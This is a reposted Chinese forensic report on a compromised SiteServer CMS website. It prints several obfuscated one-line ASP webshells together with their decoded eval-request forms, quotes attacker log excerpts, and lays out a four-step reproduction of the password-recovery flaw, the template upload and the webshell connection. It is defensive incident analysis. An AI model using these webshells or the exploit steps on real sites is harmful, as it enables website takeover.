安全资讯

取证分析之网站入侵分析报告

字号+ 作者:sqler 来源:转载 2016-11-24 20:39 我要评论( )

入侵分析报告 目录 1 情况概述 3 1.1 入侵情况 3 1.2 应急情况 3 1.3 分析结果 3 1.3.1 分析结论 3 1.3.2 木马文件名及目录 4 2 分析过程 5 2.1 操作系统分析 5 2.......

入侵分析报告
目录
1 情况概述        3
      1.1 入侵情况        3
      1.2 应急情况        3
      1.3 分析结果        3
           1.3.1 分析结论        3
           1.3.2 木马文件名及目录        4
2 分析过程        5
      2.1 操作系统分析        5
           2.1.1 系统帐号分析        5
           2.1.2 系统进程分析        5
           2.1.3 系统开放端口分析        5
           2.1.4 系统日志分析        5
      2.2 网站系统分析        6
           2.2.1 网站木马分析        6
           2.2.2 网站日志分析        11
      2.3 网站漏洞验证        25
3 分析结果        25
4 处理建议        26
      4.1 异常文件清理        26
      4.2 漏洞修补        26
5 加固优化建议        26
      5.1 常规加固和优化        26
      5.2 网站云安全监测和云防护建议        28

1 情况概述1.1 入侵情况
XX站点被黑客入侵并上传大量静态广告页面,经XX相关领导引荐和指示,由我公司远程协助XX对其入侵情况进行分析和应急处置工作。

1.2 应急情况
入侵应急时间
XXX
入侵应急单位
XXX
入侵分析人员
XXX、XXX
漏洞验证人员
XXX、XXX
日志分析量
XXX
报告撰写人员
XXX

1.3 分析结果
1.3.1 分析结论
  • 站点最早于10月17日被黑客入侵,入侵后网站日志被删除或之前未记录网站日志,无法分析之前的入侵动作;
  • 站点被入侵后,不断有黑客在站点的各个目录上传多种大大小小的webshell木马文件,并且利用木马文件上传了大量的静态广告页,黑客未篡改主要页面,由此判断此次入侵事件主要是基于经济目的黑产行为
  • 仅为网站被入侵,网站操作系统尚未发现被提权现象;
  • 通过选取其中几个木马文件相关IP访问日志的分析,基本判断为黑客利用网站后台找回密码功能页面(该页面位置为“/siteserver/forgetPassword.aspx”)漏洞,获取后台管理员口令,通过后台上传单页模版功能页面(该页面位置为“/siteserver/cms/background_templateIncludeAdd.aspx”)上传webshell木马文件;

1.3.2 木马文件名及目录
经我司技术人员分析,XX网站目录下的webshell木马文件情况主要如下表所示:
序号
木马文件名
所在目录
上传时间
备注
1
aa.aspx
\cms\
2016-01-05   19:47:40
未验证,已清除
2
caomfig.asp
\SiteFiles\Module\
2015-11-09   19:39:42
已验证,已清除
3
ck.asp
\SiteFiles\Module\
2015-11-06   19:58:17
已验证,已清除
4
fnc_png.asp
\SiteFiles\SSO\
2015-11-12  18:08:03
未验证,已清除
5
comnus.asp
\SiteServer\CMS\
2015-11-09     21:19:11
未验证,已清除
6
fnc_png.asp
\Template\Content\
2015-11-09   21:20:34
未验证,已清除
7
tags.asp
\Template\Content\
2015-10-17   13:08:04
未验证,已清除
8
caomfig.asp
\UserCenter\Auth\
2015-11-09   21:21:31
已验证,已清除
9
cnd.asp
\SiteFiles\Services\Platform\
2015-11-09  21:18:02
未验证,已清除
10
fuck.aspx
\SiteFiles\TemporaryFiles\contents\
2015-12-29  20:45:49
未验证,已清除
11
const.asp
\SiteFiles\TemporaryFiles\Site\utils\
2015-10-17  13:08:04
未验证,已清除
12
testcn.asp
     
13
19153949490.aspx
\upload\images\201511\
2015-11-19  15:39:49
未验证,已清除
14
19185035531.aspx
\upload\images\201511\
2015-11-19  18:50:35
未验证,已清除
15
asp.asp
\cms\
2015-11-30  20:00:38
已验证,已清除
16
wg.asp
\cms\
2015-11-30  20:00:38
已验证,已清除
17
chaussureme.asp
\SiteFiles\Module\BBS\Files\BBS\ajax\
2015-11-09  21:15:16
已验证,已清除
18
ciuge.asp
\SiteFiles\Module\BBS\Files\BBS\templates\default\
2015-11-09  21:16:47
已验证,已清除

2 分析过程
2.1 操作系统分析
2.1.1 系统帐号分析
首先分析系统账户情况,利用工具分析情况如下图所示:
经分析明确系统帐号Administrator、Guest等帐号,未见其他提权账号、隐藏帐号等异常。
2.1.2 系统进程分析
因网站服务器性能问题,teamview、远程桌面等速度太慢经常掉线,以至于无法对系统进程做深入分析,因此此次入侵分析过程中,未对系统进程进行分析。
2.1.3 系统开放端口分析
因网站服务器性能问题,teamview、远程桌面等速度太慢经常掉线,因此此次入侵分析过程中,未对系统对外开放端口进行分析。
2.1.4 系统日志分析
因网站服务器性能问题,teamview、远程桌面等速度太慢经常掉线,因此此次入侵分析过程中,未对系统日志进行分析。

2.2 网站系统分析
2.2.1 网站木马分析
2.2.1.1 webshell文件检测
利用专业工具对XX网站目录进行检测,结果如下图所示:
将相关检测结果(部分木马文件已经被删除,未做验证)统计梳理如下表所示:
序号
木马文件名
所在目录
上传时间
备注
1
aa.aspx
\cms\
2016-01-05   19:47:40
未验证,已清除
2
caomfig.asp
\SiteFiles\Module\
2015-11-09   19:39:42
已验证,已清除
3
ck.asp
\SiteFiles\Module\
2015-11-06   19:58:17
已验证,已清除
4
fnc_png.asp
\SiteFiles\SSO\
2015-11-12   18:08:03
未验证,已清除
5
comnus.asp
\SiteServer\CMS\
2015-11-09   21:19:11
未验证,已清除
6
fnc_png.asp
\Template\Content\
2015-11-09   21:20:34
未验证,已清除
7
tags.asp
\Template\Content\
2015-10-17   13:08:04
未验证,已清除
8
caomfig.asp
\UserCenter\Auth\
2015-11-09  21:21:31
已验证,已清除
9
cnd.asp
\SiteFiles\Services\Platform\
2015-11- 09  21:18:02
未验证,已清除
10
fuck.aspx
\SiteFiles\TemporaryFiles\contents\
2015-12-29  20:45:49
未验证,已清除
11
const.asp
\SiteFiles\TemporaryFiles\Site\utils\
2015-10-17  13:08:04
未验证,已清除
12
testcn.asp
     
13
19153949490.aspx
\upload\images\201511\
2015-11-19  15:39:49
未验证,已清除
14
19185035531.aspx
\upload\images\201511\
2015-11-19  18:50:35
未验证,已清除
15
asp.asp
\cms\
2015-11-30  20:00:38
已验证,已清除
16
wg.asp
\cms\
2015-11-30  20:00:38
已验证,已清除
17
chaussureme.asp
\SiteFiles\Module\BBS\Files\BBS\ajax\
2015-11-09  21:15:16
已验证,已清除
18
ciuge.asp
\SiteFiles\Module\BBS\Files\BBS\templates\default\
2015-11-09  21:16:47
已验证,已清除

2.2.1.2 木马文件验证
因为工具检测存在误报问题,因此正常情况下需要人工进一步分析可疑文件源代码或构建文件运行环境,访问相关可疑文件页面进行验证,以明确其是否为真正的webshell木马文件。
说明:因大部分检查的可疑webshell木马文件被提前删除,无法针对这些被删除的文件做进一步的验证,此次仅针对未删除的可疑文件进行验证。
2.2.1.2.1 ck.asp
序号
木马文件名
所在目录
上传时间
1
ck.asp
\SiteFiles\Module\
2015-11-06  19:58:17
使用工具打开ck.asp文件,查看其代码如下图所示:

选取其中一行代码如下:
  1. <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
复制代码
经过去除干扰后,代码如下:
  1. <%eval" ("eval (request (0-2-5))")%>
复制代码
由此确认该可疑文件为一句话webshell木马。
2.2.1.2.2 caomfig.asp
序号
木马文件名
所在目录
上传时间
1
caomfig.asp
\SiteFiles\Module\
2015-11-09  19:39:42
使用工具打开caomfig.asp文件,查看其代码如下图所示:

此文件源码未做干扰处理,根据其源代码判断caomfig.asp文件为一句话webshell木马。

2.2.1.2.3 asp.asp
序号
木马文件名
所在目录
上传时间
1
asp.asp
\cms\
2015-11-30  20:00:38
使用工具打开asp.asp文件,查看其代码如下图所示:

该文件源代码显示为该文件可以接收来自远端主机的相关连接请求,由此可判断asp.asp文件为webshell木马文件无疑。
2.2.1.2.4 wg.asp
序号
木马文件名
所在目录
上传时间
1
wg.asp
\cms\
2015-11-30  20:00:38


wg.asp文件源代码与asp.asp文件一样可以接收来自远端主机的相关连接请求,wg.asp文件为webshell木马文件无疑。
2.2.1.2.5 chaussureme.asp
序号
木马文件名
所在目录
上传时间
1
chaussureme.asp
\SiteFiles\Module\BBS\Files\BBS\ajax\
2015-11-09  21:15:16
使用工具打开chaussureme.asp文件,查看其代码如下图所示:

其源代码如下:
  1. Roxm<%@codepage=65000%><%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("1")%>
复制代码
去除干扰后源代码如下:
  1. Roxm<%@codepage=65000%><%response.codepage=936:eval request("1")%>
复制代码
由上述代码可确认chaussureme.asp文件为一句话webshell木马。

2.2.1.2.6 ciuge.asp
序号
木马文件名
所在目录
上传时间
1
ciuge.asp
\SiteFiles\Module\BBS\Files\BBS\templates\default\
2015-11-09  21:16:47
使用工具打开ciuge.asp文件,查看其代码如下图所示:

其源代码如下:
  1. 九哥<%@codepage=65000%><%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("1")%>
复制代码
去除干扰后源代码如下:
  1. 九哥<%@codepage=65000%><%response.codepage=936:eval request("1")%>
复制代码
由上述代码可确认ciuge.asp文件为一句话webshell木马。
2.2.2 网站日志分析
此次入侵事件的分析过程中涉及到的网站访问日志量较大,具体日志量相关情况如下:
日志量
1.97GB
日志日期
2015年10月17日-2016年1月11日
日志文件数量
86个
说 明:我们在分析过程中,主要根据木马文件名、关联时间、IP地址、漏洞页面文件名等作为关联分析的依据,在1.97G的日志里分析入侵者的动作、利用的漏 洞页面、访问调用的木马文件、利用木马文件所做的事情等,但是因日志量非常大,此次报告中仅挑选几个作为分析过程的佐证和说明,不对全部分析过程做记录。

2.2.2.1 木马/SiteFiles/Module/caomfig.asp访问日志分析
针对木马“/SiteFiles/Module/caomfig.asp”的访问,其日志情况如下截图所示:

2015年11月9日,黑客对该木马进行了尝试访问,并且访问成功。2015年11月12日之后,黑客陆续利用该木马文件上传了大量的文件,如下图所示:
 
围绕该木马文件,通过日志分析明确入侵者的动作如下表所示:
序号
木马利用者IP
利用时间
利用动作
备注
1
27.149.159.51
2015-11-09 11:40:48
尝试木马是否可用
 
2
27.149.158.147
2015-11-09 13:21:46
尝试木马是否可用
 
3
27.149.147.35
2015-11-12 09:22:49至 2015-11-12 10:17:01
利用木马上传文件
 
4
27.149.156.246
2015-11-15 15:44:30至
2015-11-15 15:49:00
利用木马上传文件
 
5
27.149.159.177
2015-11-17 16:37:52至
2015-11-17 16:55:11
利用木马上传文件
 
2.2.2.2 木马/include/aa.aspx访问日志分析
针对木马“/include/aa.aspx”的访问,其日志情况如下截图所示:

上图清晰显示在2016年1月5日,黑客陆续利用该木马文件上传了大量的文件。
围绕该木马文件,通过日志分析明确入侵者的动作如下表所示:
序号
木马利用者IP
利用时间
利用动作
备注
1
119.97.184.48
2016-01-05 11:48:23至
2016-01-05 11:53:31
利用木马上传文件
 
2
183.60.15.14
2016-01-05 11:59:36
尝试木马是否可用
 
3
14.17.34.190
2016-01-05 11:59:39
尝试木马是否可用
 
4
59.50.64.34
2016-01-05 12:28:23至
2016-01-05 18:03:02
利用木马上传文件
 
5
59.50.64.34
2016-01-07 20:19:06至
2016-01-07 23:46:33
利用木马上传文件
 

2.2.2.3 入侵者59.50.64.34访问动作日志分析
2015 年11月17日04点55分05秒至2016年1月5日17点47分11秒,59.50.64.34访问了/youxi目录下的大量html静态页面(应 该是以前利用木马上传的广告静态页),该访问行为并不大,可判断为入侵者在不断测试访问他的广告页面访问是否正常,如下图所示:

自2016年1月5日17点47分后,59.50.64.34开始利用“/include”目录下的“aa.aspx”木马文件不断上传文件(具体上传的文件通过日志无法明确,可与网站目录下的文件时间关联确认),如下图所示:

根据入侵者的IP地址,通过日志分析明确入侵者的动作如下表所示:
序号
入侵者动作
入侵者动作时间
备注
1
访问/youxi/、/cktm/等目录下静态页
2015-11-17 04:55:05至
2016-01-10 19:23:36
间隔数小时访问一次,无明显规律,判断应为人工访问判断广告静态页的存活
2
/include/aa.aspx上传文件
2016-01-05 12:28:23至
2016-01-07 23:46:33
利用木马上传静态广告页



2.2.2.4 入侵者119.97.184.48访问动作日志分析
入侵者119.97.184.48最早在2016年1月5日不断利用background_templateIncludeAdd.aspx上传各种asp木马,如下图所示:

我们把其中部分日志摘录出来,便于查看如下:

[89927] 2016-01-05 11:42:29 172.16.1.2 GET /siteserver/cms/background_templateIncludeAdd.aspx PublishmentSystemID=1 80 - 119.97.184.48   200 0 0 562
[89930] 2016-01-05 11:42:42 172.16.1.2 POST /siteserver/cms/background_templateIncludeAdd.aspx PublishmentSystemID=1 80 - 119.97.184.48  200 0 0 218
[89931] 2016-01-05 11:42:44 172.16.1.2 GET /siteserver/cms/background_templateInclude.aspx PublishmentSystemID=1 80 - 119.97.184.48  200 0 0 265
[89933] 2016-01-05 11:42:47 172.16.1.2 GET /siteserver/loading.aspx RedirectType=Loading&RedirectUrl=cms/background_templateInclude.aspx?PublishmentSystemID=1 80 - 119.97.184.48  200 0 0 234
[89934] 2016-01-05 11:42:49 172.16.1.2 GET /siteserver/cms/background_templateInclude.aspx PublishmentSystemID=1 80 - 119.97.184.48  200 0 0 1187
黑客利用background_templateIncludeAdd.aspx页面上传木马,如下图所示:


file:///C:/Users/ADMINI~1/AppData/Local/Temp/ksohtml/wpsEE2.tmp.png
我们把其中部分日志摘录出来,便于查看如下:
[90614] 2016-01-05 11:46:44 172.16.1.2 GET /siteserver/cms/background_templateInclude.aspx PublishmentSystemID=1 80 - 119.97.184.48 200 0 0 437
[90615] 2016-01-05 11:46:47 172.16.1.2 GET /siteserver/cms/background_templateIncludeAdd.aspx PublishmentSystemID=1&FileName=asy.asp 80 - 119.97.184.48 200 0 0 718
[90617] 2016-01-05 11:47:00 172.16.1.2 POST /siteserver/cms/background_templateIncludeAdd.aspx PublishmentSystemID=1&FileName=asy.asp 80 - 119.97.184.48 200 0 0 765
[90621] 2016-01-05 11:47:03 172.16.1.2 GET /siteserver/cms/background_templateInclude.aspx PublishmentSystemID=1 80 - 119.97.184.48 200 0 0 953
[90622] 2016-01-05 11:47:04 172.16.1.2 GET /include/asy.asp |3|800a0409|未结束的字符串常量 80 - 119.97.184.48 500 0 0 171
黑客利用background_templateIncludeAdd.aspx页面删除木马,如下图所示:

我们把其中部分日志摘录出来,便于查看如下:
[91005] 2016-01-05 11:52:24 172.16.1.2 POST /include/aa.aspx - 80 - 119.97.184.48 200 0 0 2656
[91013] 2016-01-05 11:53:03 172.16.1.2 POST /include/aa.aspx - 80 - 119.97.184.48 200 0 0 8156
[91016] 2016-01-05 11:53:06 172.16.1.2 GET /siteserver/cms/background_templateInclude.aspx PublishmentSystemID=1&Delete=True&FileName=ss.aspx 80 - 119.97.184.48 200 0 0 1765
[91019] 2016-01-05 11:53:24 172.16.1.2 POST /include/aa.aspx - 80 - 119.97.184.48 200 0 0 406
[91022] 2016-01-05 11:53:31 172.16.1.2 GET /cms/aa.aspx - 80 - 119.97.184.48 200 0 0 61687
[91023] 2016-01-05 11:53:31 172.16.1.2 POST /include/aa.aspx - 80 - 119.97.184.48 200 0 0 78

根据入侵者的IP地址,通过日志分析明确入侵者的动作如下表所示:
序号
入侵者动作
入侵者动作时间
备注
1
/siteserver/cms/background_templateIncludeAdd.aspx
2016-01-05 11:42:29至
2016-01-05 11:53:06
入侵者不断利用background_templateIncludeAdd.aspx上传各种asp木马
2
/include/ss.aspx
/include/asy.asp /include/asp.asp
/include/aa.aspx
2016-01-05 11:43:37至
2016-01-05 11:53:03
入侵者尝试访问上传的木马,并利用上传的木马上传其他文件(木马或静态广告页)
3
/1.txt
2016-01-05 11:49:21
应该是入侵者尝试访问利用木马上传的文件
4
/cms/aa.aspx
2016-01-05 11:53:31
尝试访问利用木马上传到其他目录的木马文件


2.2.2.5 入侵者119.29.55.175访问动作日志分析
入侵者119.29.55.175于2016年1月5日11:26:52利用forgetPassword.aspx页面漏洞,提交口令找回请求,获得站点后台管理员口令,如下图所示:

我们把其中部分日志摘录出来,便于查看如下:
[86135] 2016-01-05 11:26:45 172.16.1.2 GET /siteserver/forgetPassword.aspx - 80 - 119.29.55.175 200 0 0 0
[86144] 2016-01-05 11:26:46 172.16.1.2 GET /browserconfig.xml - 80 - 119.29.55.175 404 0 2 46
[86165] 2016-01-05 11:26:52 172.16.1.2 POST /siteserver/forgetPassword.aspx - 80 - 119.29.55.175 200 0 0 15
[86171] 2016-01-05 11:26:54 172.16.1.2 POST /siteserver/forgetPassword.aspx - 80 - 119.29.55.175 200 0 0 15
[86219] 2016-01-05 11:27:08 172.16.1.2 POST /siteserver/login.aspx - 80 - 119.29.55.175 302 0 0 406
[86222] 2016-01-05 11:27:08 172.16.1.2 GET /siteserver/default.aspx - 80 - 119.29.55.175 302 0 0 78
[86225] 2016-01-05 11:27:08 172.16.1.2 GET /siteserver/initialization.aspx - 80 - 119.29.55.175 200 0 0 140
根据入侵者的IP地址,通过日志分析明确入侵者的动作如下表所示:
序号
入侵者动作
入侵者动作时间
备注
1
/siteserver/forgetPassword.aspx
2016-01-05 11:25:15
访问forgetPassword.aspx页面
2
/WebResource.axd
2016-01-05 11:25:15至
2016-01-05 11:26:34
尝试利用/WebResource.axd漏洞入侵
3
/siteserver/forgetPassword.aspx
2016-01-05 11:26:52
2016-01-05 11:26:54
利用forgetPassword.aspx页面漏洞,提交口令找回请求,获得站点后台管理员口令
4
/siteserver/login.aspx
2016-01-05 11:27:08
利用获取的口令登录网站后台
5
/siteserver/cms/background_templateIncludeAdd.aspx
2016-01-05 11:29:00
利用background_templateIncludeAdd.aspx页面上传ss.asp
6
/include/ss.php
2016-01-05 11:29:41
访问上传的ss.php木马(asp站上传php木马,判断该入侵者应为初学者)
7
/siteserver/cms/background_templateInclude.aspx
2016-01-05 11:29:55
利用background_templateInclude.aspx页面删除ss.php
8
/siteserver/cms/background_templateIncludeAdd.aspx
2016-01-05 11:30:27
利用background_templateIncludeAdd.aspx页面上传ss.asp
9
/include/ss.asp
2016-01-05 11:30:35
访问上传的ss.asp木马文件
2.2.2.6 forgetPassword.aspx漏洞页面访问日志分析
forgetPassword.aspx功能页面存在漏洞,黑客利用该页面漏洞入侵网站,那么我们分析一下在这段时间内对forgetPassword.aspx页面进行访问的IP情况,如下图所示:

11月6日,14.148.211.29地址对该页面进行了访问,并且提交了POST请求,如下图所示:

经过分析,明确利用该页面入侵的入侵者IP地址和时间如下表所示:
序号
入侵者IP
入侵者时间
备注
1
14.148.211.29
2015-11-06 11:53:15
 
2
14.148.230.8
2015-12-08 14:28:35
 
3
119.0.33.122
2015-12-09 05:04:41
 
4
110.188.250.26
2015-12-29 12:34:29
 
5
175.2.227.37
2016-01-05 11:24:38
 
6
119.29.55.175
2016-01-05 11:25:15
 
7
222.244.124.67
2016-01-07 15:40:41
 
8
223.157.134.225
2016-01-09 12:11:59
 

2.3 网站漏洞验证
依据上述分析的结果,XX公司web安全工程师XX、XX在公司实验服务器中搭建了siteserver CMS 3.6.4版本的环境,并在此环境下针对我们分析的结果进行了验证工作,验证步骤主要如下:
  • www.域名.com/siteserver/forgetPassword.aspx使用火狐打开,禁用JS(火狐中网址处输入about:config,在里面找到javascript.enabled一项,改为false);
  • 输入默认后台账号admin,经行找回(有密保问题的无法利用此0day),如无密保问题,直接点击下一步,显示出密码;
  • 进入后台-》站点管理-》显示功能-》模板管理-》添加单页模板-》写入一句话木马-》直接生成aspx;
  • 菜刀连接木马,Getshell。
经上述四步验证工作,我们明确了入侵者的入侵方式和利用的漏洞点。
3 分析结果
经过上述分析,结论大致如下:
  • 站点最早于10月17日被黑客入侵,入侵后网站日志被删除或之前未记录网站日志,无法分析之前的入侵动作;
  • 站点被入侵后,不断有黑客在站点的各个目录上传多种大大小小的webshell木马文件,并且利用木马文件上传了大量的静态广告页,黑客未篡改主要页面,由此判断此次入侵事件主要是基于经济目的黑产行为
  • 仅为网站被入侵,网站操作系统尚未发现被提权现象;
  • 通过选取其中几个木马文件相关IP访问日志的分析,基本判断为黑客利用网站后台找回密码功能页面(该页面位置为“/siteserver/forgetPassword.aspx”)漏洞,获取后台管理员口令,通过后台上传单页模版功能页面(该页面位置为“/siteserver/cms/background_templateIncludeAdd.aspx”)上传webshell木马文件;

4 处理建议
4.1 异常文件清理
  • 将网站内的可疑文件全部找出后,经验证为木马文件的,从网站目录中清理;
  • 通过日志分析结合文件时间属性,确认由木马文件上传的静态广告页文件,并从网站目录清理。

4.2 漏洞修补
  • 删除存在漏洞的功能页面;
  • 联系开发商,对网站提供升级,或对存在漏洞的功能页面进行修补。
5 加固优化建议
5.1 常规加固和优化
需要针对该站点相关结构、网络、安全防护设备、主机、中间件、应用、数据库等进行全面的安全评估,并针对分析评估结果,提供相应的加固和优化措施。下面简单罗列数条供参考:
o 操作系统层面加固
1) 严格控制系统相关文件的访问权限,非root用户不允许具备相关文件的写和删除权限,这样即使存在上传漏洞,入侵者也不能上传文件;
2) 严格配置系统的本地安全策略;
o 中间件层面加固
1) 严禁上传后缀为php,jsp,asp,aspx等文件;
2) 修改配置文件,开启访问日志,必要的情况下使用第三方产品采集日志;
3) 定期对中间件进行安全扫描;
4) 优化相关配置参数;
o 应用系统层面加固
1) 多系统应该分开部署,避免一个系统被黑客入侵拿下其他系统也一并拿下;
2) 记录相关访问和操作日志;
3) 使用复杂口令,并且定期更改口令;
4) 配置文件中的数据库密码不能使用明文,避免入侵者看到数据库密码,进入入侵数据库;
5) 不要使用一些开源的上传组件,尤其是存在明显上传漏洞的上传的组件;
6) 在站点上线之前要对代码做安全审计,并且定期做安全审计检查;
o 数据库层面加固
1) 使用复杂口令,并且定期更换口令;
2) 应用系统和数据库分开部署;
3) 严格控制用户的读、写和删除权限;
4) 不允许非系统管理员用户具有清空表、删除表等功能;
5) 严格限制数据库连接IP,禁止外网IP访问数据库;
6) 定期备份数据库;
7) 配置优化数据库参数;
o 硬件层面加固
1) 根据需要,严格制定相应的策略;
2) 针对重要应用和网段,开启日志记录功能;
3) 设备本身的优化和加固;
4) 。。。。。
o 日志的第三方采集
1) 为后续可能出现的安全事件提供明确的分析依据,建议XX网站开启网站访问日志的记录功能并发送至第三方日志存储。

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Information/229.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~